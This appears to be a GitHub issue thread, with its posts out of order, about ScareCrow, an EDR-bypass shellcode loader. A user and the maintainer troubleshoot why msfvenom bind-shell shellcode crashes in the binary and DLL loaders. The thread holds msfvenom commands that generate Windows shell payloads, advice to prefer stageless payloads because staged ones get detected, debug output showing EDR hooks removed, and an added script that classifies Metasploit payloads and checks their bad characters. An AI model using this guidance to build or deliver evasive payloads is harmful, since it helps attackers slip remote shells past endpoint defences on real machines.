Closed 0xShkk closed 3 years ago
Can you provide me the exact version of Windows you tested on?
Sure, it was on:

OS Name: Microsoft Windows 10 Enterprise 1909
OS Version: 10.0.18363.1379
I will spin up an instance tonight for testing, to see if I can recreate this issue. But I am curious: if you try without the -b '\x00', do you still get the same issue?
So, based on my testing, it looks like it's the fact that you are using a staged bind shellcode, since a staged shellcode performs the task of downloading and executing the actual shellcode from the listener. The problem here is that the binaries generated by ScareCrow use a different technique from the DLLs, one in which the stack pointer for the string of shellcode is overwritten with the attributes of an actual executable function, so when that function is executed the shellcode is executed. Because of the nature of staged payloads, this crashes the process.
I confirmed this works fine with the other modes, such as `-Loader control`, where you can create an executable control panel applet (as this method uses a different technique to execute shellcode). You can also use a stageless version of your shellcode and that will work just fine as well.
Based on my experience, I recommend avoiding staged payloads, as the communication to download the second stage (stage1) shellcode is often IOC'd and detected.
I hope this helps?
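Two checks that would have shortened the back-and-forth above, as an added example that is not part of this thread or of ScareCrow itself. `payload_kind` applies the Metasploit naming convention to a payload name: staged payloads separate stage and stager with a slash (`windows/x64/meterpreter/reverse_tcp`), stageless builds join them with an underscore (`windows/x64/meterpreter_reverse_tcp`), and anything else is a single. `count_nulls` counts 0x00 bytes in a raw shellcode file, which is the question behind the `-b '\x00'` experiment. The bytes written by `write_sample_shellcode` are constructed here to resemble the first ten bytes of an msfvenom x64 prologue; they are not taken from the thread, and the function and file names are this example's own.

```shell
#!/bin/sh
# Added example, not part of the ScareCrow project or this thread.

# Classify a Metasploit payload name as "staged", "stageless" or "single".
# Convention: <platform>[/<arch>]/<stage>/<stager> is staged,
#             <platform>[/<arch>]/<stage>_<stager> is stageless.
payload_kind() {
    last=${1##*/}          # final path component, e.g. reverse_tcp or shell_bind_tcp
    rest=${1%/*}
    prev=${rest##*/}       # component before it, e.g. meterpreter or x64
    for stage in meterpreter shell vncinject dllinject powershell upexec \
                 patchupmeterpreter patchupdllinject peinject custom; do
        if [ "$prev" = "$stage" ]; then
            echo staged
            return 0
        fi
        case $last in
            "$stage"_*)
                echo stageless
                return 0 ;;
        esac
    done
    echo single
}

# Count 0x00 bytes in a raw shellcode file. A non-zero result after
# msfvenom -b '\x00' means the bad-char option did not do what you expected.
count_nulls() {
    tr -cd '\000' < "$1" | wc -c | tr -d ' '
}

# Write constructed sample bytes (NOT real msfvenom output) resembling the
# start of an x64 prologue: fc 48 83 e4 f0 e8 c0 00 00 00 -> three nulls.
write_sample_shellcode() {
    printf '\374\110\203\344\360\350\300\000\000\000' > "$1"
}

# Demo run: classify a few names, then count nulls in the constructed sample.
for p in windows/x64/meterpreter/reverse_tcp windows/x64/meterpreter_reverse_tcp \
         windows/x64/shell_bind_tcp windows/x64/shell/bind_tcp windows/x64/exec; do
    printf '%-40s %s\n' "$p" "$(payload_kind "$p")"
done
tmp=$(mktemp)
write_sample_shellcode "$tmp"
printf 'null bytes in sample: %s\n' "$(count_nulls "$tmp")"
rm -f "$tmp"
```

Under this convention an underscore name such as `windows/x64/shell_bind_tcp` classifies as stageless, while `windows/x64/shell/bind_tcp` is the staged form; run `payload_kind` on the exact name you passed to msfvenom, and `count_nulls` on the exact .raw file you fed to the loader, before changing anything else.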
Thank you for helping me out. The loader type control works just fine!
Unfortunately, I can't get binary or dll to work, even with a non staged shellcode.
Oh, and regarding your first question: yes, without the badchar definition \x00 it's the same result.
This is the debug output for a non-staged msf shellcode payload, if it helps:

```
[DEBUG] [+] Detected Version: 10.0
[DEBUG] [+] Reloading: C:\Windows\System32\kernel32.dll
[DEBUG] [+] Reloading: C:\Windows\System32\kernelbase.dll
[DEBUG] [+] Reloading: C:\Windows\System32\ntdll.dll
[DEBUG] [+] EDR removed
[DEBUG] [*] Create a Pointer on stack
[DEBUG] [*] Loading shellcode into a string
[DEBUG] [*] Copy Pointer's attributes
[DEBUG] [*] Overwriten Pointer to point to shellcode String
Exception 0xc0000005 0x1 0xc03544f54b 0xc00013c013
PC=0xc00013c013
runtime: unknown pc 0xc00013c013
stack: frame={sp:0xc000130000, fp:0x0} stack=[0xc00012e000,0xc000136000)
000000c00012ff00: 0000000000000000 0000000000000000
000000c00012ff10: 0000000000000000 0000000000000000
000000c00012ff20: 0000000000000000 0000000000000000
000000c00012ff30: 0000000000000000 0000000000000000
000000c00012ff40: 0000000000000000 0000000000000000
000000c00012ff50: 0000000000000000 0000000000000000
000000c00012ff60: 0000000000000000 0000000000000000
000000c00012ff70: 0000000000000000 0000000000000000
000000c00012ff80: 0000000000000000 0000000000000000
000000c00012ff90: 0000000000000000 0000000000000000
000000c00012ffa0: 0000000000000000 0000000000000000
000000c00012ffb0: 0000000000000000 0000000000000000
000000c00012ffc0: 0000000000000000 0000000000000000
000000c00012ffd0: 0000000000000000 0000000000000000
000000c00012ffe0: 0000000000000000 0000000000000000
000000c00012fff0: 0000000000000000 0000000000000000
000000c000130000: <0000000000000000 0000000000000000
000000c000130010: 0000000000000000 0000000000000000
000000c000130020: 0000000000000000 0000000000000000
000000c000130030: 0000000000000000 0000000000000000
000000c000130040: 0000000000000000 0000000000000000
000000c000130050: 0000000000000000 0000000000000000
000000c000130060: 0000000000000000 0000000000000000
000000c000130070: 0000000000000000 0000000000000000
000000c000130080: 0000000000000000 0000000000000000
000000c000130090: 0000000000000000 0000000000000000
000000c0001300a0: 0000000000000000 0000000000000000
000000c0001300b0: 0000000000000000 0000000000000000
000000c0001300c0: 0000000000000000 0000000000000000
000000c0001300d0: 0000000000000000 0000000000000000
000000c0001300e0: 0000000000000000 0000000000000000
000000c0001300f0: 0000000000000000 0000000000000000
runtime: unknown pc 0xc00013c013
stack: frame={sp:0xc000130000, fp:0x0} stack=[0xc00012e000,0xc000136000)
000000c00012ff00: 0000000000000000 0000000000000000
000000c00012ff10: 0000000000000000 0000000000000000
000000c00012ff20: 0000000000000000 0000000000000000
000000c00012ff30: 0000000000000000 0000000000000000
000000c00012ff40: 0000000000000000 0000000000000000
000000c00012ff50: 0000000000000000 0000000000000000
000000c00012ff60: 0000000000000000 0000000000000000
000000c00012ff70: 0000000000000000 0000000000000000
000000c00012ff80: 0000000000000000 0000000000000000
000000c00012ff90: 0000000000000000 0000000000000000
000000c00012ffa0: 0000000000000000 0000000000000000
000000c00012ffb0: 0000000000000000 0000000000000000
000000c00012ffc0: 0000000000000000 0000000000000000
000000c00012ffd0: 0000000000000000 0000000000000000
000000c00012ffe0: 0000000000000000 0000000000000000
000000c00012fff0: 0000000000000000 0000000000000000
000000c000130000: <0000000000000000 0000000000000000
000000c000130010: 0000000000000000 0000000000000000
000000c000130020: 0000000000000000 0000000000000000
000000c000130030: 0000000000000000 0000000000000000
000000c000130040: 0000000000000000 0000000000000000
000000c000130050: 0000000000000000 0000000000000000
000000c000130060: 0000000000000000 0000000000000000
000000c000130070: 0000000000000000 0000000000000000
000000c000130080: 0000000000000000 0000000000000000
000000c000130090: 0000000000000000 0000000000000000
000000c0001300a0: 0000000000000000 0000000000000000
000000c0001300b0: 0000000000000000 0000000000000000
000000c0001300c0: 0000000000000000 0000000000000000
000000c0001300d0: 0000000000000000 0000000000000000
000000c0001300e0: 0000000000000000 0000000000000000
000000c0001300f0: 0000000000000000 0000000000000000
rax 0x3522f400
rbx 0x0
rcx 0xc000122c60
rdi 0xd2bc0d7000
rsi 0x1ed4e1
rbp 0xc000135f78
rsp 0xc000130000
r8 0xc000135d98
r9 0xc000135e28
r10 0x0
r11 0x212
r12 0xffffffffffffffff
r13 0x28
r14 0x27
r15 0xaa
rip 0xc00013c013
rflags 0x10206
cs 0x33
fs 0x53
gs 0x2b
```
I do not know if it really makes a difference, but I tried to create the shellcode like so:

```shell
msfvenom -p windows/x64/shell_bind_tcp LPORT=8888 -f raw -o bind2.raw
msfvenom -p windows/x64/shell_bind_tcp LPORT=8888 -f raw -o bind2.raw -b '\x00'
msfvenom -p windows/x64/shell_bind_tcp EXITFUNC=none LPORT=8888 -f raw -o bind2.raw
msfvenom -p windows/x64/shell_bind_tcp PrependMigrate=true LPORT=8888 -f raw -o bind2.raw
msfvenom -p windows/x64/shell_bind_tcp PrependMigrate=true EXITFUNC=thread LPORT=8888 -f raw -o bind2.raw
```

None of the above executed successfully via the binary or DLL loader method.
I tested with the following and they worked fine in both binary and DLL format:

- `windows/x64/meterpreter_bind_tcp`
- `windows/x64/meterpreter_reverse_tcp`
As for your debug output, the memory addresses look blank, which tells me something else went wrong. Since you mentioned that the control loader type worked for you (which is just a fancy DLL), I suspect something else is going on. At any rate, if the control loader worked, I take it I can close this issue?
The DLL loader worked for me now too. I had to rename the DLL so rundll32 executed the correct one (as you mention in the tool output).
Thank you so much for this great tool and the help!
I would like to thank you for providing such a complete framework and the research details first of all!
Unfortunately, I was not able to create valid payloads with ScareCrow so far. As an example, I tried the shellcode creation via msfvenom first:
or
Then I tried to use ScareCrow on it:
which succeeds in creating a binary loader. But the resulting exe is not working on a Windows box. The resulting debug output in the console is:
I also tried to use Donut to create an x64 shellcode of an existing binary, as well as using DLL as a loader for ScareCrow for both generated shellcodes (msf and Donut). Nothing has worked so far for me.
Can you please give me more details on what kind of shellcode payload ScareCrow expects? Maybe provide some examples in the documentation?
Many thanks